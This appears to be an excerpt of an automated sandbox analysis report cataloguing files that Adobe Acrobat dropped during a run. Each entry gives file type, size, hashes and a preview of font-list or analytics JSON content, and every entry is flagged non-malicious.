                                                                            Entropy (8bit):5.233980037532449
                                                                            Encrypted:false
                                                                            SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                            MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                            SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                            SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                            SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                            Malicious:false
                                                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:PostScript document text
                                                                            Category:dropped
                                                                            Size (bytes):1233
                                                                            Entropy (8bit):5.233980037532449
                                                                            Encrypted:false
                                                                            SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                            MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                            SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                            SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                            SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                            Malicious:false
                                                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:PostScript document text
                                                                            Category:dropped
                                                                            Size (bytes):1233
                                                                            Entropy (8bit):5.233980037532449
                                                                            Encrypted:false
                                                                            SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                            MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                            SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                            SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                            SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                            Malicious:false
                                                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:PostScript document text
                                                                            Category:dropped
                                                                            Size (bytes):10880
                                                                            Entropy (8bit):5.214360287289079
                                                                            Encrypted:false
                                                                            SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                            MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                            SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                            SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                            SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                            Malicious:false
                                                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:PostScript document text
                                                                            Category:dropped
                                                                            Size (bytes):10880
                                                                            Entropy (8bit):5.214360287289079
                                                                            Encrypted:false
                                                                            SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                            MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                            SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                            SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                            SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                            Malicious:false
                                                                            Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):295
                                                                            Entropy (8bit):5.3505025885059245
                                                                            Encrypted:false
                                                                            SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJM3g98kUwPeUkwRe9:YvXKX9drEZc0v2GMbLUkee9
                                                                            MD5:DE16E4AC9E1A90875D2A72FAC474BF90
                                                                            SHA1:5AC48F30314B0B2A50D4502F3BFD2E164BE10C6E
                                                                            SHA-256:04FABCE6CCDB7BECD98DA42B5055EFF28BF01F6B3629F7A41A1AFEA58007C0ED
                                                                            SHA-512:47E873A350DE84A19CC43E4FE7AAD6486EE11778A752F7BFC3E3613A22D72B53697F6A6F96C8F5B6B544DBDA773DF514D09AE7C3CD2343FD7B6018E005AD3E7C
                                                                            Malicious:false
                                                                            Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):294
                                                                            Entropy (8bit):5.298335401437078
                                                                            Encrypted:false
                                                                            SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfBoTfXpnrPeUkwRe9:YvXKX9drEZc0v2GWTfXcUkee9
                                                                            MD5:51D958E01C2936D316E71B046D7B00D0
                                                                            SHA1:515DD1513B3BAAD70990BEE5B6640D0A4EA8A676
                                                                            SHA-256:21D98BEDB66D1FC9DDFB8CB0282180CA1EAE761D21C401FD56A4F04BD9A43BC3
                                                                            SHA-512:BCCFDD66746E6A2D40192B26FED2BF127A9C9465D94311B91D5442A881558D73ED84D4A9D3972B4511FEC06D9E937EB0437DB3DE569511AB9F73348B862981BC
                                                                            Malicious:false
                                                                            Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):294
                                                                            Entropy (8bit):5.277156476482677
                                                                            Encrypted:false
                                                                            SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfBD2G6UpnrPeUkwRe9:YvXKX9drEZc0v2GR22cUkee9
                                                                            MD5:84AEBFBA61A4F47397F3BAE1EB35EFEB
                                                                            SHA1:8959CA817AF3BF10F10BAC617CEC7F904670D739
                                                                            SHA-256:93BFA14FE9CF847B37F06D7870C16FB62B832200A6E7AA070A223D3D9C99E42D
                                                                            SHA-512:CD8CE406E322D50A07C482C168C3C79E8279C64966BF09EEEA0D251813478E0A2B0E97F389BEF1C7674165461309218A0E0A6728D2375653B797E30063A4904D
                                                                            Malicious:false
                                                                            Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):285
                                                                            Entropy (8bit):5.337061838637531
                                                                            Encrypted:false
                                                                            SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfPmwrPeUkwRe9:YvXKX9drEZc0v2GH56Ukee9
                                                                            MD5:F57B295E1879E47A87C7AAFB79C74F28
                                                                            SHA1:52F0F9260C60E4A00FCD1FAA7FFA9F97BEBDB4DB
                                                                            SHA-256:7C015830064ABCD644D2D19DB1A1DB5E4C23E8483B1CE54E6ABF00B1D1ACFAEE
                                                                            SHA-512:897AD1B2E90E0A1DF2D91B513233A3D149C37CC368B704FB36AFD9C9B3FB4174ED558D84B2D00A10A788AC6A4CCB367EE8CB34CA9099CD43F78C8AF2F6B265BC
                                                                            Malicious:false
                                                                            Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):1255
                                                                            Entropy (8bit):5.697841344751659
                                                                            Encrypted:false
                                                                            SSDEEP:24:Yv6XjrEzvjpLgEsv4ce3KnctSrymTBcu14wChluBks8ctq3H6w:YvjbhgnvjRrNTB5OJhABks8c2H3
                                                                            MD5:83B5A78640074BE50C0A976ADEA3188E
                                                                            SHA1:CFDB548C7444E09D8FD369B95A8901848B9E6626
                                                                            SHA-256:3B28454658CEB3A135FC34293AA490BC5948A17DC7793E5885A6B5264ADF9DC2
                                                                            SHA-512:F1363A2091EE3AEF59B01BC2FC94924B0494412C3D9ABED7143C327E7AC98419565C67E44A5E5769C38FFAF735FA1FC3BF0C9810061E93C6F8D99EE725523644
                                                                            Malicious:false
                                                                            Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_0","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"f7fa0e9f-7d25-4321-b719-c501bbb8a162","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJDb252ZXJ0IGZpbGVzIHRvIGFuZCBmcm9tIFBERiBcbndpdGhvdXQgbGltaXRzLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5k
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):1250
                                                                            Entropy (8bit):5.705924650104191
                                                                            Encrypted:false
                                                                            SSDEEP:24:Yv6XjrEzv/VLgEsy4c19ZrGmTBcu14wCh5rgos8ctq3H6w:YvjXFgnyl9ZrBTB5OJhFgos8c2H3
                                                                            MD5:AE1F871F39266581C6EAAB0052C008FE
                                                                            SHA1:6912F063B612B28221FB9FBDBE79218A8F29AAF4
                                                                            SHA-256:51F479F1DFEEB00A09AC293149374033FAA816F2B04798FCF55AB1B4489BD3AF
                                                                            SHA-512:3823C1FA97549E41C9575F1ADE7F191FC7C237B219AC41C8263B1E162BA68AB2556D74CE304A8C5CCB065D991138EA4A3914342E4D48E29F317E23113990418B
                                                                            Malicious:false
                                                                            Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_1","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"250f56c6-2d66-4fca-8033-eabbd2bc9951","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJDb252ZXJ0LCBlZGl0IGFuZCBlLXNpZ24gUERGXG4gZm9ybXMgJiBhZ3JlZW1lbnRzLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5kX2Nvb
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):292
                                                                            Entropy (8bit):5.2852649756232015
                                                                            Encrypted:false
                                                                            SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfQ1rPeUkwRe9:YvXKX9drEZc0v2GY16Ukee9
                                                                            MD5:6733266AE2B020F034106EA395FDB3C4
                                                                            SHA1:82048A05972CA8AE630931E29A0169EDD709D20B
                                                                            SHA-256:D91121A0C51D8AA3444AFA7AB8BCAB9CC45EC217383AE71CC268063886C25993
                                                                            SHA-512:7C8CBD17BA4BACDDC4621C64AF1A0436703B6A718EE86A91192F30D64D03EF8C820DC5C860D09C6BB94E52F37C2BE354C2F5FC5417AA02DD9ABF56CB4359CFC7
                                                                            Malicious:false
                                                                            Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):1230
                                                                            Entropy (8bit):5.687883485146177
                                                                            Encrypted:false
                                                                            SSDEEP:24:Yv6XjrEzvO2LgEsk4ccVrhmTBcu14wChds8ctq3H6w:YvjGognkMVrYTB5OJhds8c2H3
                                                                            MD5:1D66578DDBF4CB4486114223831DD601
                                                                            SHA1:40BFD718948AD425DCCAC0E4C1685140EDCF0387
                                                                            SHA-256:5B5B2BCFE44DF186B670B7F0518C3D48D38AE63CE091B78431B70D8E5FD070C3
                                                                            SHA-512:5D3CEDE81164DD149DEF0C55A8C8544F66751BEC9DC0FDC553A08F54703B55571F02BA451CC3F36BDF0D2D4EA2A3E624462207E11D2BB54541F99CE7AC89E9D6
                                                                            Malicious:false
                                                                            Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_3","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"07caa165-20a7-4c5f-adf8-061ef3d98af3","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5kX2NvbG9yX2RhcmtfdGhlbWUiO
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):1368
                                                                            Entropy (8bit):5.7518951012339485
                                                                            Encrypted:false
                                                                            SSDEEP:24:Yv6XjrEzvCKLgEGcooZbq0jCaBrwJoZct5uWaHbX3H6w:YvjqEgNoNtlSJEc3uWaHbHH3
                                                                            MD5:1202543A9C0708D01BEB1B9FAE071D78
                                                                            SHA1:E0A8D838CBE598262B5EDD2DB4BBB1BC5FB1A3BB
                                                                            SHA-256:C039E62C2A97ED47B074D88309B1030F63E4F8998F5E6422CD36ABA5304D316A
                                                                            SHA-512:A0F85F2531EA3263027F73AFFCAF7AEADA7969BD482E27F601CD5BFBFAEAA3A98A1D9C15036A9BA1258AAB0C84C110E95DA7C54BC1E8954114286B8491A518D6
                                                                            Malicious:false
                                                                            Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"70654_217714ActionBlock_0","campaignId":70654,"containerId":"1","controlGroupId":"","treatmentId":"692283b7-dc9d-4f79-9ee2-bccf324c2980","variationId":"217714"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJUcnkgQWNyb2JhdCBQcm8ifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNyIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTEiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIDctZGF5IHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0byBhbGwgUERGIGFuZCBlLXNpZ25pbmcgdG9vbHMuIiwiYmFja2d
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):289
                                                                            Entropy (8bit):5.286890275515594
                                                                            Encrypted:false
                                                                            SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfYdPeUkwRe9:YvXKX9drEZc0v2Gg8Ukee9
                                                                            MD5:E04A348FCA881C4EAF32B8EFC79BCD26
                                                                            SHA1:AAD874B9796EA320F8FDF8DDD56E3216C6A772CD
                                                                            SHA-256:1821E6655CCBFA2FCE7EE122A0A8900C200C3663CB70E44A6BDF536E6747139D
                                                                            SHA-512:DFD84B36C3C5AF7B0931A950564F93BFFD1D6BB99409E43E109D651803B26F7CB173E30258EDC1646DAEE3C40560E30C340151D9C86F0EA503FC07795185DB72
                                                                            Malicious:false
                                                                            Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):1395
                                                                            Entropy (8bit):5.774979893660522
                                                                            Encrypted:false
                                                                            SSDEEP:24:Yv6XjrEzvBrLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNNw:YvjZHgDv3W2aYQfgB5OUupHrQ9FJQ
                                                                            MD5:63C08DEEE241B08F4F595DA9AD5125CB
                                                                            SHA1:90A5918EB07A4873458C86964F3C394647A8C814
                                                                            SHA-256:A12F7D69BBEC7E8349C5BF9947F883673D15BF39CB49E2C2398AA96489342990
                                                                            SHA-512:6181F6664FFB2E2001FD4AFCD2767ED2BA2DCB80ED0F71DF88416E7FDA64D42556DA147D75340C3137599DE6F90091DD6B41F0ABD007634F4AE9CF8BF08736B9
                                                                            Malicious:false
                                                                            Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):291
                                                                            Entropy (8bit):5.270527474388663
                                                                            Encrypted:false
                                                                            SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfbPtdPeUkwRe9:YvXKX9drEZc0v2GDV8Ukee9
                                                                            MD5:66618CF190C3033ABAB2383F1A037CDD
